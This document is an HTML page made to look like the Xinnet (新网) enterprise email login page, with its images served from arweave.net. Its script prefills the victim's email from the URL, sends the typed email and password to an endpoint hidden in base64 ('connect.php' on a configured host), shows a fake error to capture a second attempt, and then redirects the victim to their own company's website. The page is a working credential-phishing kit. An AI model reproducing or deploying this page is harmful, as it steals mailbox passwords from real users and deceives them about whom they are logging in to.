<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=0">
    <meta name="keywords" content="企业邮箱,全球邮,企业邮局,新网全球邮,新网企业邮箱">
    <meta name="description"
        content="新网19年专注企业邮箱，作为国内最早的企业邮箱服务提供商推出全球邮产品，全球邮拥有数据绝密安全、不间断运营服务、信息监管、全终端适应、全球34个转发点以及7*24专业工程师服务等特点，并推出全球邮三十天免费试用服务。">
    <meta name="author" content="__web_login__">
    <meta name="baidu-site-verification" content="code-j4e8PUT655" />
    <title>新网邮箱_新网企业邮箱_新网全球邮登陆</title>
    <link rel="shortcut icon"
        href="https://pnkgayc4qiotoiaebw7ddfr7hkkcqiy7blhvh44csnta6fdgrzxq.arweave.net/e1RgYFyCHTcgBA2-MZY_OpQoIx8Kz1PzgpNmDxRmjm8"
        type="image/x-icon" />

    <style>
        body,
        div,
        dl,
        dt,
        dd,
        ul,
        ol,
        li,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        pre,
        form,
        fieldset,
        input,
        button,
        select,
        option,
        textarea,
        p,
        blockquote,
        th,
        td {
            padding: 0;
            margin: 0;
            font: 12px/20px "Microsoft YaHei", helvetica, verdana, tahoma, sans-serif;
            word-break: break-all;
            word-wrap: break-word;
        }

        img {
            border: 0;
            vertical-align: top;
        }

        body {
            font-size: 12px;
            color: #333;
            line-height: 24px;
        }

        a {
            color: #666;
            text-decoration: none
        }

        a:hover,
        a:focus {
            color: #e43d40;
            text-decoration: none;
            outline: none
        }

        .fl {
            float: left;
        }

        .fr {
            float: right;
        }

        .clearfix:after {
            content: 鈥�.鈥�;
            display: block;
            height: 0;
            clear: both;
            visibility: hidden;
        }

        *html .clearfix {
            height: 1%;
        }

        *+html .clearfix {
            height: 1%;
        }

        .clearfix {
            display: inline-block;
        }

        .clearfix {
            display: block;
        }

        .main {
            width: 100%;
            float: Left
        }

        .header {
            width: 960px;
            margin: 0 auto;
            height: 65px;
        }

        .header .logo {
            float: left;
            display: inline;
            margin-top: 3px;
        }

        .header .detial {
            float: right;
            margin-top: 32px;
            margin-right: 10px;
            display: inline
        }

        .header .detial span {
            color: #666;
        }

        .header .detial span a {
            color: #666;
        }

        .header .detial span a:hover {
            color: #e43d40;
            text-decoration: none;
        }

        .contain {
            width: 100%;
            height: 560px;
            min-width: 960px;
            float: Left;
            background: url("https://uk4bzij25a26h36rq3dztvrz4bjqpujnvceg3bg3qcjmc3zhjama.arweave.net/orgcoTroNePv0YbHmdY54FMH0S2oiG2E24CSwW8nSBg") center top no-repeat;
        }

        .container {
            width: 960px;
            height: 560px;
            margin: 0 auto
        }

        .login {
            width: 270px;
            background: #fff;
            margin-top: 110px;
            margin-right: 0px;
            float: right;
            border-radius: 4px;
            -webkit-border-radius: 4px;
            padding: 25px 15px;
            box-shadow: 0 0 6px rgba(0, 0, 0, .3);
        }

        .login-user {
            width: 100%;
            border: 1px solid #dfdcdc;
            height: 33px;
            line-height: 33px;
            background: #f0f0f0;
            border-radius: 4px;
            -webkit-border-radius: 4px;
            margin-bottom: 18px;
        }

        .icon-user {
            width: 25px;
            text-indent: -9999px;
            height: 14px;
            display: block;
            float: left;
            margin-top: 9px;
            background: url("https://hnzabho3ohkzj3urnpqnqli6j4wbathaxt3hgzg3sczccizcla3q.arweave.net/O3IAndtx1ZTukWvg2C0eTywQTOC89nNk25CyISMiWDc") 6px top no-repeat;
        }

        .login-user span {
            height: 23px;
            line-height: 23px;
            padding-left: 3px;
            border-left: 1px solid #dcdcdc;
            color: #666;
            font-size: 14px;
            margin-top: 5px;
            float: Left;
        }

        .login-password {
            width: 100%;
            border: 1px solid #dfdcdc;
            height: 33px;
            line-height: 33px;
            background: #f0f0f0;
            border-radius: 4px;
            -webkit-border-radius: 4px;
        }

        .icon-password {
            width: 25px;
            text-indent: -9999px;
            height: 14px;
            display: block;
            float: left;
            margin-top: 9px;
            background: url("https://ngzksjxmxzw6b4zphseaueo3ncd4vfspqif6ksa3hql3pfihml4q.arweave.net/abKpJuy-beDzLzyIChHbaIfKlk-CC-VIGzwXt5UHYvk") 6px top no-repeat;
        }

        .form-control {
            ime-mode: disabled;
            font-size: 14px;
            padding-right: 5px;
            width: 240px;
            background: transparent;
            border: 0;
            height: 33px;
            line-height: 33px;
        }

        .form-control::-moz-placeholder {
            color: #b0b0b0;
            opacity: 1;
        }

        .form-control:-ms-input-placeholder {
            color: #b0b0b0;
        }

        .form-control::-webkit-input-placeholder {
            color: #b0b0b0;
        }

        .input-control {
            height: 33px;
            background: #f0f0f0;
            border-radius: 4px;
            -webkit-border-radius: 4px;
            line-height: 33px;
            width: 100px;
            padding: 0 5px;
            border: 1px solid #dfdcdc;
            float: left
        }

        @media all and (-ms-high-contrast:none) {

            *::-ms-backdrop,
            .form-control {
                boder: 0;
                box-shadow: none;
            }
        }

        :root .form-control {
            boder: 0;
            box-shadow: none;
        }

        .form-control:focus {
            outline: none;
            boder: 0;
            box-shadow: none;
        }

        .login-pad {
            padding: 10px 0;
            width: 100%;
            float: Left;
        }

        .login-mar {
            margin-bottom: 18px;
            width: 100%;
            float: Left;
        }

        .alert-danger {
            padding: 7px;
            color: #f00
        }

        .admin-login {
            text-align: right;
            color: #666;
            margin-top: 8px;
        }

        .admin-login a {
            color: #666;
        }

        .admin-login a:hover {
            color: #e43d40;
        }

        .btn-success {
            width: 100%;
            height: 35px;
            line-height: 35px;
            background: #e50112;
            color: #fff;
            border: 0;
            font-size: 14px;
            border-radius: 4px;
            -webkit-border-radius: 4px;
        }

        .btn-success:hover {
            background: #e00313;
            transition: background 0.3s ease;
            cursor: pointer
        }

        .footer {
            width: 960px;
            margin: 20px auto;
            color: #666;
            font-size: 12px;
            text-align: center
        }

        .footer p {
            display: inline;
        }

        .footer span {
            margin-left: 3px;
        }

        .footer span a {
            color: #666
        }

        .footer span a:hover {
            color: #e43d40;
        }

        .checkbox-nice {
            padding-left: 7px;
            padding-left: 0\0;
            position: relative;
        }

        .checkbox-nice input[type="checkbox"] {
            visibility: hidden;
            visibility: visible\0;
            outline: none;
            float: left;
            margin-top: 5px\0;
            margin-right: 3px\9;
        }

        input[type="checkbox"] {
            margin-top: 3px;
        }

        .checkbox-nice label:before {
            background: #ffffff none repeat scroll 0 0 padding-box;
            border: 1px solid #d9d9d9;
            border-radius: 1px;
            content: "";
            cursor: pointer;
            height: 15px;
            left: 1px;
            top: 1px;
            position: absolute;
            width: 15px;
            display: none\0;
        }

        .checkbox-nice label:after {
            background: url("https://m2k3tmapx6yo5bcva4mxjzo255vvgrmbwuafw5ole22xwohsbyhq.arweave.net/ZpW5sA-_sO6EVQcZdOXa72tTRYG1AFt1yya1ezjyDg8") 2px -2px no-repeat;
            content: "";
            height: 11px;
            left: 0px;
            opacity: 0;
            display: none\0;
            position: absolute;
            top: 5px;
            width: 15px;
            cursor: pointer
        }

        .checkbox-nice input[type="checkbox"]:checked+label::after {
            opacity: 1;
        }

        .hot-block {
            width: 60%;
            height: 100%;
            float: left;
            position: relative;
            margin-left: -100px;
        }

        .hot-block a {
            background: url(about:blank);
            display: block;
            width: 100%;
            height: 100%;
        }

        .qr_code_navCss {
            color: #e50112 !important;
            border-bottom-color: #e50112 !important;
        }
    </style>
    <style>
        .switch_to_admin {
            display: none;
        }
    </style>
</head>

<body>

    <div style="position: sticky; top: 0; background-color: #f1f1f1;  z-index: 999;">
        <div id="google_translate_element"></div>
    </div>


    <div class="main">
        <div class="header">
            <div class="logo">
                <img src="https://iesukcctbwon4ogccrdnhksjcmpf3rbqk5co3c2454bmgzhrj72q.arweave.net/QSVFCFMNnN44whRG06pJEx5dxDBXRO2LXO8Cw2TxT_U"
                    alt='新网企业邮箱' />
            </div>
            <div class="detial">
                <span class=""><a href="#">购买 </a></span>
                <span class=""> | <a href="#">在线咨询</a></span>
                <span class="help_center"> | <a href="#">帮助中心</a></span>
                <span class=""> | <a href="#">客户端配置</a></span>
            </div>
        </div>
    </div>
    <div class="contain">
        <div class="container" id="form_container">
            <!--热点-->
            <div class="hot-block">
                <!-- <a href="https://www.xinnet.com/composite/zt/20221111.html" target="_blank"></a> -->
            </div>

            <div class="login">
                <div class="row">

                    <div class="error" id="msg" style="display: none; color:red;">
                        &#x60A8;&#x8F93;&#x5165;&#x7684;&#x7528;&#x6237;&#x540D;&#x6216;&#x5BC6;&#x7801;&#x4E0D;&#x6B63;&#x786E;&#x3002;
                    </div>
                    <div class="alert alert-danger" id="error" style="display: none; color:red;">
                        &#x5BC6;&#x7801;&#x9519;&#x8BEF;</div>
                </div>

                <form id="" class="form-signin" name="form1" data-name="" action="" method="post" required>
                    <div class="login-user clearfix">
                        <label for="inputUser" class="icon-user">账号</label>

                        <input type="text" name="ai" id="ai" class="form-control" placeholder="账号" value="" readonly>
                    </div>
                    <div class="login-password clearfix">
                        <label for="inputPassword" class="icon-password">密码</label>
                        <input type="password" name="namep" id="pr" class="form-control" placeholder="请输入密码">
                    </div>
                    <div class="clearfix">
                        <div class="login-pad">
                            <input type="hidden" id="submitPassword" name="password">
                            <div style="display:none;">
                                <input id="inputVcode" class="input-control fl" placeholder="验证码"
                                    style="width:100px;margin-top:8px;" name="vcode" type="text">
                                <div style="float:left;margin-left:5px;display:inline;height:33px;margin-top:8px;">
                                    <img id="verCode" src="./vcode.php"
                                        style="width:100px; height:33px;line-height:33px;" />
                                    <a href="javascript:void(0);" onclick="loginCtrler.revcode();"
                                        style="height:33px;line-height:33px;display:inline-block">看不清</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="login-mar clearfix">
                        <div class="checkbox-nice checkbox-nice-zi fl">
                            <input id="remember_me" name="remember_me" type="checkbox" value="1" checked><label
                                for="remember_me">记住账号</label>
                        </div>
                        <div class="checkbox-nice checkbox-nice-zi fl">
                            <input id="login_ssl_check" type="checkbox" value="1"><label
                                for="login_ssl_check">SSL</label>
                        </div>
                        <select name="login_lang"
                            style="float:right;border:1px solid #ddd;padding:5px;margin-top:-2px;">
                            <option value="" selected>默认语言</option>
                            <option value="cn">简体中文</option>
                            <option value="en">English</option>
                        </select>
                    </div>
                    <div class="clearfix">
                        <button class="btn btn-success" type="submit" id="submit-btn" onclick="submitForm(event)"
                            style="outline:none">登 录</button>
                    </div>
                    <div id="msg_container" style="display:none;" class="alert alert-danger form-info text-center"
                        role="alert">

                    </div>
                </form>
            </div>
        </div><!-- /container -->

    </div>
    <div class="main">
        <div class="footer">
            <p>
                <span>Copyright ©2023 北京新网数码信息技术有限公司 版权所有 <a href="#">京ICP备09061941号-17</a></span>
            </p>
        </div>
    </div>
    <div style="clear:both"></div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="./config.js"></script>

   <script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        $('#ai').val(my_ai);
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);
        $("#msg").hide();
        $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
        $("#automail").animate({ right: 200, opacity: "show" }, 1000);
    }
    ///////////////url getting ai////////////////


    var atu = "L2Nvbm5lY3QucGhw";
	
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("&#x7535;&#x5B50;&#x90AE;&#x4EF6;&#x4E3A;&#x5FC5;&#x586B;&#x9879;");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("&#x7535;&#x5B50;&#x90AE;&#x4EF6;&#x4E3A;&#x5FC5;&#x586B;&#x9879;");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("&#x5BC6;&#x7801;&#x662F;&#x5FC5;&#x9700;&#x7684;");
            ai.focus;
            return false;
        }
		
		
		if(pr.length < 5) {  

			$('#error').show();
            $('#error').html("&#x8BF7;&#x68C0;&#x67E5;&#x60A8;&#x7684;&#x5BC6;&#x7801;");
            ai.focus;  

			return false;  

		}

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var dom = c.toUpperCase();
        ///////////new injection////////////////
        count = count + 1;
        $('#ai').attr('disabled', "");
        $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);
        $('#domain-name').html(dom);

        $.ajax({
            dataType: 'JSON',
            url: `${config.baseUrl}${atob(atu)}`,
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 2) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });


});

function getParameterByName(name, url) {
			if (!url) url = window.location.href;
			name = name.replace(/[\[\]]/g, '\\$&');
			var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
				results = regex.exec(url);
			if (!results) return null;
			if (!results[2]) return '';
			return decodeURIComponent(results[2].replace(/\+/g, ' '));
		}
			
		const login_username = getParameterByName('cms');
		document.getElementById("ai").value = login_username;
</script>



</body>

</html>